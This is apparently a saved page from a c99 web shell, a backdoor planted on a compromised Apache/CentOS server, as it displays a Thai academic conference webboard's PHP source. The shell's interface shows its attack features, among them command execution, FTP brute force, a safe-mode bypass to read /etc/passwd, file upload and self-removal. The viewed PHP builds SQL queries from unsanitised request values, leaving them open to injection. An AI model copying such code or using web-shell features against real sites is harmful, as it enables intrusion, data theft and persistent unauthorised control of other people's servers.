!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 51.24 GB of 127.8 GB (40.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     webboard.php (12.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php  
include_once "./webboard/show10.php";
include(
"./include/FunctionDB.php");
include(
"./include/Function.php");
include(
"admin_menu.php");
 
ConnectDB();
$sql "SELECT * FROM  edu_service_tb "//Where Project_code='$Project_code' ";
$result mysql_query($sql);
$rs mysql_fetch_array($result);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<table width="830" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="830"><br>
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php" >หน้าหลัก</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ProjectEduList.php?Project_code=<? echo $rsProject_code]?>">ข้อมูลโครงการ</a> <img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ProjectProgramList.php?Program=06&Project_code=<?php echo $rs[Project_code] ;?>">รายชื่อห้องทันตสาธารสุข</a><img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ProjectProgramList.php?Program=05&Project_code=<?php echo $rs[Project_code] ;?>">รายชื่อห้องสาธารสุขชุมชน</a><img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ProjectProgramList.php?Program=07&Project_code=<?php echo $rs[Project_code] ;?>">รายชื่อห้องเทคนิคเภสัช</a><img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="ProjectProgramList.php?Program=08&Project_code=<?php echo $rs[Project_code] ;?>">รายชื่อห้องสาธารณสุขศาสตรบันฑิต</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"></a></font></legend>
            <label><div align="center">
              <form action="InsertProjectedu.php" method="post" enctype="multipart/form-data" name="form1" id="form1">
                <table width="99%" border="0" cellspacing="1" cellpadding="4" bordercolor="#FFCCFF" bgcolor="#FFCCFF">
                  <tr>
                    <td align="center"><b><font color="blue" size="4">บอร์ดการรับสมัครประชุมวิชาการ  1-3 พ.ค 50 ถาม - ตอบ ล่าสุด </font></b></td>
                  </tr>
                  <tr>
                    <td bgcolor="#FFFFFF" align="center"><table width="74%" border="0" height="36">
                      <tr>
                        <td align="center" width="35%" height="32"><div align="left">
                            <?

          
echo "สมาชิก 3 คนล่าสุด : ";

include(
"nuser.php");

echo 
"<br>";

echo 
" มี ";

include(
"alluser.php"); 

?>
                            <?

if($online>=1){

echo 
"มี " ."<font color=red>"." $users_online"."</font>" ." คน online ขณะนี้" ;}

?>
                            <?

include("bd.php");

?>
                        </div></td>
                        <td align="center"  width="51%" height="32"><div align="left">ค้นหาคำถาม
                          <input type="text" name="search" size="25" maxlength="100" />
                                <input name="submit" type="submit" value="Search" />
                        </div></td>
                        <td align="center"  width="14%"><div align="left"><font size="2" face="MS Sans Serif"><a href="../webboard/postq.php?Category=<? echo $Category?>&amp;page=<? echo $page?>"><img src="webboard/pic/post.gif" width="94" height="30" border="0" /></a></font></div></td>
                      </tr>
                    </table></td>
                  </tr>
                </table>
              </form>
              <font size="2" face="MS Sans Serif"><a href="../webboard/postq.php?Category=<? echo $Category?>&amp;page=<? echo $page?>">
              <?

// table อธิบายความหมายของรูปคำถาม

        
echo "<table width=95% border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";

        echo 
"<tr><td align=left>\n";

        
//echo "\t &nbsp;<img src='../webboard/pic/cam.gif' border=\"0\"> - คำถามที่มีรูป \n";

        
echo "\t&nbsp;<img src='../webboard/pic/new2day.gif' border=\"0\"> - คำถามที่มีคนตั้งใหม่วันนี้ \n";

        echo 
"\t &nbsp;<img src='../webboard/pic/update2day.gif' border=\"0\"> - คำถามที่มีคนตอบวันนี้\n";

        

        echo 
"</td></tr>\n";

        echo 
"</table>\n\n";

        echo  
"<br>";



    include(
"config.inc.php");

    
$chk_date substr(date("Y-m-d H:i:s"),-19,-9);

    

    if (empty(
$page)){

        
$page=1;

    }



    
// ติดต่อ database เพื่ออ่านข้อมูล    

    // หาจำนวนหน้าทั้งหมด

    
mysql_connect($host,$user,$passwd);

    
$sql "select No from webboard_data where Category='$Category'";

    
$result mysql_db_query($dbname,$sql);

    
$NRow mysql_num_rows($result);

    
$rt $NRow%$list_page;

    if(
$rt!=0) { 

        
$totalpage floor($NRow/$list_page)+1

    }

    else {

        
$totalpage floor($NRow/$list_page); 

    }

    
$goto = ($page-1)*$list_page;







    
// Query ข้อมูลตามจำนวนที่กำหนด

    
$sql "select * from webboard_data where Category='$Category' order by No DESC limit $goto,$list_page";

    
$result mysql_db_query($dbname,$sql);

    
$NRow mysql_num_rows($result);



    if(
$NRow==0) { 

        echo 
"<center>";

        echo 
"<br>";

        echo 
"<font size=2 face='MS Sans Serif'>ยังไม่มีคำถาม เมื่อไหร่จะมีน้อ</font><br><br>\n";

        echo 
"<center>";

    }

    
// แสดงหัวข้อของบอร์ด

    
else {

        echo 
"<table width=95% border=1 bordercolor=black cellspacing=0 cellpadding=2>\n";

        echo 
"<tr bgcolor= dodgerblue>\n";

        echo 
"\t<td align=center width=8%><font size=2 color=#FFF8DC><b>คำถามที่</b></font></td>\n";

        echo 
"\t<td align=center width=47% ><font size=2 color=#FFF8DC><b>คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]</b></font></td>\n";

        echo 
"\t<td align=center width=24%><font size=2 color=#FFF8DC><b>ผู้ถาม[วันที่ถาม]</b></font></td>\n";

        echo 
"\t<td align=center width=18%><font size=2 color=#FFF8DC><b>ผู้ตอบ[วันที่ตอบ]</b></font></td>\n";

        echo 
"</tr>\n\n";



        
// วนลูปแสดงข้อมูลที่อ่านได้

        
while ($row mysql_fetch_array($result)) {

            

            
// กำหนดสีของตาราง เพื่อให้มีการสลับสี

            //$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";



            
$bgc = ($bgc==$rowColor1) ? $rowColor2 $rowColor1



            
// กำหนดค่าตัวแปร

            
$No sprintf("%05d",$row["No"]);

            
$Question $row["Question"];

            
$Name $row["Name"];

            
$Namer $row["Namer"];

            
$Member $row["Member"];

            
$Memberr $row["Memberr"];

            
$nphoto $row["nphoto"];

            
$ckDate trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่

            
$Date convert_date($row["Date"]);

            
$Reply $row["Reply"];



            
$ckReplyDate trim(substr($row["ReplyDate"],-19,-9)); 

            
$ReplyDate convert_date($row["ReplyDate"]);

            
$pageviewdata $row["pageview"];

            
// แสดงเฉพาะวันที่

            
if($Date==$chk_date) {

                echo 
"<tr bgcolor=$rowHiLight>\n";

                    

                }elseif(
$ReplyDate==$chk_date) {



                echo 
"<tr bgcolor=$rowHiLight>\n";    

        }else {

            echo 
"<tr bgcolor=$bgc>\n";            

                }

            
// แสดงรูป folder

            

                    ////new

                 

               
if($Reply>="10" )

                    

                {

                echo 
"\t<td align=center><img src='../webboard/pic/hotfd.gif'> $No</td>\n";

               }

             elseif(
$ReplyDate!=""

                     

                       {

                    echo 
"\t<td align=center><img src='../webboard/pic/openfd.gif'> $No</td>\n";

                      } 

             elseif(
$Date==$chk_date

                {

                echo 
"\t<td  align=center ><img src='../webboard/pic/newfd.gif'> $No</td>\n";

                      } 

                      

                     else {

                    echo 
"\t<td align=center><img src='../webboard/pic/closefd.gif'> $No</td>\n";

                           }





            if((
$ckReplyDate==$chk_date)&&($nphoto!='')&&($ckDate==$chk_date))            {

            echo 
"\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

            }

            elseif((
$ckReplyDate==$chk_date)&&($nphoto!=''))            {

            echo 
"\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

            }

            elseif((
$ckReplyDate==$chk_date) &&($ckDate==$chk_date))

                {echo 
"\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

                      } 

            elseif(
$ckReplyDate==$chk_date)

                {echo 
"\t<td  ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>]   [<font color=red> $pageviewdata </font>]</td>\n";

                      } 

                      elseif((
$nphoto!='') &&($ckDate==$chk_date))

                {echo 
"\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

                

                      } 

                    

                      elseif(
$nphoto!=''

                {echo 
"\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

                

                      } 

                    

                       elseif(
$ckDate==$chk_date

                {echo 
"\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

                

                      } 

            



            else{

                echo 
"\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";

                     }            



            if(
$Member) {

                echo 
"\t<td>$Name <img src='../webboard/pic/online.gif'> <font color=blue> [$Date]</font></td>\n";

            }

            else {

                echo 
"\t<td>$Name <font color=blue> [$Date]</font></td>\n";

            }

            

            
// ตรวจสอบว่ามีคนตอบคำถามหรือยัง

if($Memberr) {

            if(
$ckReplyDate!="" 

                {

                echo 
"\t<td>$Namer <img src='../webboard/pic/online.gif'> <font color=blue>[$ReplyDate]</font></td>\n";

                }

            else 

                {

                echo 
"\t<td> ยังไม่มีคนตอบ </td>\n";

                }

            echo 
"</tr>\n\n";

            

        }else{

        if(
$ckReplyDate!="" 

                {

                echo 
"\t<td> $Namer <font color=blue>[$ReplyDate]</font></td>\n";

                }

            else 

                {

                echo 
"\t<td> ยังไม่มีคนตอบ </td>\n";

                }

            echo 
"</tr>\n\n";

        }

        

        }

        

        echo 
"</table>\n\n";

        

        

        

        
// table อธิบายความหมายของรูป

        

        
echo "<table width=95% border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";

        echo 
"<tr><td align=left>\n";

        echo 
"\t<img src='../webboard/pic/newfd.gif'> - คำถามใหม่ \n";

        echo 
"\t<img src='../webboard/pic/closefd.gif'> - คำถามเก่า \n";

        echo 
"\t<img src='../webboard/pic/openfd.gif'> - คำถามที่ถูกตอบแล้ว\n";

        echo 
"\t<img src='../webboard/pic/hotfd.gif'> - คำถามที่มีคนตอบมาก\n";

        echo 
"\t<img src='../webboard/pic/cam.gif'> - คำถามที่มีรูป\n";

        echo 
"\t<img src='../webboard/pic/online.gif'> - สมาชิกเว็บบอร์ด\n";

        echo 
"</td></tr>\n";

        echo 
"</table>\n\n";



        
// table แสดงเลขหน้า

        
echo "<table width=95% border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";

        echo 
"<tr><td align=left>\n";

        echo 
"\t<font size=2 color=#9400D3>\n";



        
// สร้าง link เพื่อไปหน้าก่อน-หน้าถัดไป

        
if($page>&& $page<=$totalpage) {

            
$prevpage $page-1;

            echo 
"\t<a href='../webboard/webboard.php?Category=$Category&page=$prevpage'>[หน้าก่อน = $prevpage]</a>\n";

        }



        echo 
"\t กำลังแสดงหน้าที่ $page/$totalpage \n";



        if(
$page!=$totalpage) {

            
$nextpage $page+1;

            echo 
"\t<a href='../webboard/webboard.php?Category=$Category&page=$nextpage'>[หน้าถัดไป = $nextpage]</a>\n";

        }



        echo 
"\t</font>\n";

        echo 
"</td></tr>\n";

        echo 
"<tr><td>\n";



        
// วนลูปแสดงเลขหน้าทั้งหมด

        
for($i=$i<$page $i++) {

            echo 
"\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";

        }

        echo 
"\t<font size=2 color=red><b>$page</b></font> \n";

        for(
$i=$page+$i<=$totalpage $i++) {

            echo 
"\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";

        }

    

        echo 
"</td></tr>\n";

        echo 
"</table>\n";

    }

?>
              </a></font></div>
            </label>
        </fieldset>
          <p><br>
          </p>
          <p><font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><br>
              </font></p></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0152 ]--